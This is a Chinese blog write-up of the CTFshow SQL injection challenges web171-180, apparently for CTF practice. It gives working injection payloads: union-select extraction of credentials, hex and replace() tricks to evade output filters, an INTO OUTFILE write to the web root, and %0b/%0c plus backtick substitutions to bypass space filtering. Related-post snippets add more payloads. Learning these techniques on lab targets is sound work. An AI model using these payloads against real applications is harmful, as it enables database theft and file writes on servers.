CTFshow-sql注入-web171-180

最新推荐文章于 2024-09-14 19:00:09 发布
最新推荐文章于 2024-09-14 19:00:09 发布
阅读量273 收藏 3
点赞数 8
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/potatojiang/article/details/141501443
版权

web171

提示:

我们发现给到的表里面的数据只是到了id=24,我们预计flag的id为25,但尝试过了发现在26

payload

999' or id='26

web172

这题比上一题多了一个

payload

9999'union select id,password from ctfshow_user2 where username = 'flag

web173

同样的题目,这次我们对flag进行处理来逃逸检测

payload

999'union select id,hex(b.username),b.password from ctfshow_user3 as b where b.username='flag

web174

这题把数字给过滤了

我们选择把数字给替换掉

paylaod

0' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'1','A'),'2','B'),'3','C'),'4','D'),'5','E'),'6','F'),'7','G'),'8','H'),'9','I'),'0','J'),'a' from ctfshow_user4--+

web175

这里我们尝试写入文件

payload

' union select username, password from ctfshow_user5 into outfile '/var/www/html/flag.txt' %23

web176

这题过滤的比较简单

payload

999' or username = 'flag

web177

这题过滤了空格

payload

替换前
999'union select 1,(password from ctfshow_user where username = 'flag'),'3';%23
替换后
999'union%0bselect'1',(select`password`from`ctfshow_user`where`username`='flag'),'3';%23

web178

上题的payload可行

web179

这里我们用%0c代替%0b代替空格

payload

999'union%0cselect'1',(select`password`from`ctfshow_user`where`username`='flag'),'3';%23

web180

上一个的payload也可用

potatojiang
关注
CTFSHOW -SQL 注入
m0_64180167的博客
11-13 761
重新来做一遍 争取不看wp。
ctfshow-web入门-sql注入web171-web175)
Welcome To Myon'Blog !
07-31 1253
这里只出了一个 id,因为换行导致我们误判为到了最后一个字符,因为我们的字典里只包括数字、小写字母和下划线,因此字符没找到,便跳出外层循环结束了代码。判断一下这次又是三个字段数了,因为还是对输出过滤了 flag,所有我们还是不查用户名,用占位符占位即可。接下来我们先判断下它数据库名的长度,这个其实可以通过 burpsuite 的攻击模块爆破的,没关系,我们这里手写一遍,也锻炼下我们 python 的能力。
ctfshow- sql注入(web入门)
..
11-19 1880
web174 这道题可以先在查询框中随便查询1或2或3,发现没有回显,猜测一下可能是盲注。 首先用bp抓包试一下,得到关键信息 http://f5096abc-7db4-4448-8da0-fccd604899d9.challenge.ctf.show/api/v3.php?id=11&page=1&limit=10 用脚本尝试一下没有回显信息,根据前面的经验,这是第四题尝试改为v4.php?id=1,发现出现回显信息。 我们可以这样写脚本 import r.
ctfshow---sql注入171-213)
fainpo的博客
05-01 776
这里提一句,为什么不直接替换成acb这种,因为,flag原本就有字母,还原的时候会全部都还原成数字的,数字替换成符号应该也是可以的,这边测试了下除了&#好像别的符号都可以。插入查询后查询语句就会变成这样,由于id=11111这是一个不存在的id,而后面1=1又为真,所以会查询到表内所有的内容,--+是注释后面的字符。因为接受username的时候没有用引号,所以接受单纯的数字,而数字和字符比较会转换类型,字符串会变成数字0进行比较,所以相等。
ctfshow-web入门-sql注入-web171
HkD01L的博客
11-22 300
此题为 【从0开始学web】系列第一百七十一题 此系列题目从最基础开始,题目遵循循序渐进的原则 从此题开始的150道题全部为sql注入,准备好了吗?
CTFSHOW-sql注入
Yb_140的博客
08-13 2520
web171 最简单的sql注入,先演示基本操作 payload: -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select
ctfshow-sql注入
m0_72898152的博客
03-07 850
ctf,sql注入
ctfshow-web入门-sql注入web196-web200)堆叠注入
Welcome To Myon'Blog !
08-08 479
这里把 create 和 drop 都过滤了,那么我们直接用 insert 插入来覆盖 pass 和 username 的值。其中 $row[0] 表示从数据库查询结果中提取的某一行的第一个字段值,我们可以使用 select 来设置$row[0] 的值,再提交我们设置的 password 满足两者相等,payload:还是堆叠注入,显示过滤了 select 实际并没有。
CTFshow之web171~180---SQL注入(1)
金 帛的博客
06-04 2423
ctfshow,SQL注入的wp
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow-web入门-sql注入-web172
HkD01L的博客
11-22 368
此题为 【从0开始学web】系列第一百七十二题 此系列题目从最基础开始,题目遵循循序渐进的原则 撸猫为主,要什么flag?
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7230
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
navicate远程linux上的pgsql提示密码失败
最新发布
记录、分享、合作、共赢
09-14 163
2、postgresql.conf文件中,修改listen_addresses。3、重启pgsql,例如:systemctl restart pgsql。1、pg_hba.conf文件中,ipv4下面的内容改成。4、如果问题还在,检查firewalld防火墙,执行。5、再次尝试连接,成功!
pandas读取xlsx文件使用sqlachemy写到数据库
ithongchou的博客
09-10 499
如果你使用的是特定的数据库(如 SQLite、PostgreSQL、MySQL),你还需要安装相应的数据库驱动。通过这些步骤,你可以方便地将 Excel 文件中的数据写入数据库。连接字符串的格式取决于你使用的数据库。(用于读取 Excel 文件)。方法将 DataFrame 数据写入数据库。读取 Excel 文件。
SQL题目解析:外卖平台数据分析
天冬忘忧的博客
09-10 1195
在本次SQL中,我们将通过一系列查询来分析外卖平台的数据,包括用户、餐厅和订单信息。这些查询将帮助我们理解用户行为、餐厅表现和订单趋势。
基于SSM和VUE的药品管理系统(含源码+sql+视频导入教程+文档)
coderbu的博客
09-12 747
基于SSM和VUE的药品管理系统2拥有两种角色 管理员:药品管理、出库管理、入库管理、销售员管理、报损管理等 销售员:登录注册、入库、出库、销售、报损等
SQL 代表什么?SQL 的全称是什么?
程序员学习园地。
09-09 1680
创建表修改表删除表。
SQL(结构性查询语句)
2301_78693337的博客
09-11 392
以上就是今天要讲的内容,本文介绍了基础的SQL语法使用,而sql还提供了大量能使我们快速便捷地处理数据的函数和方法等着我们探索。
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值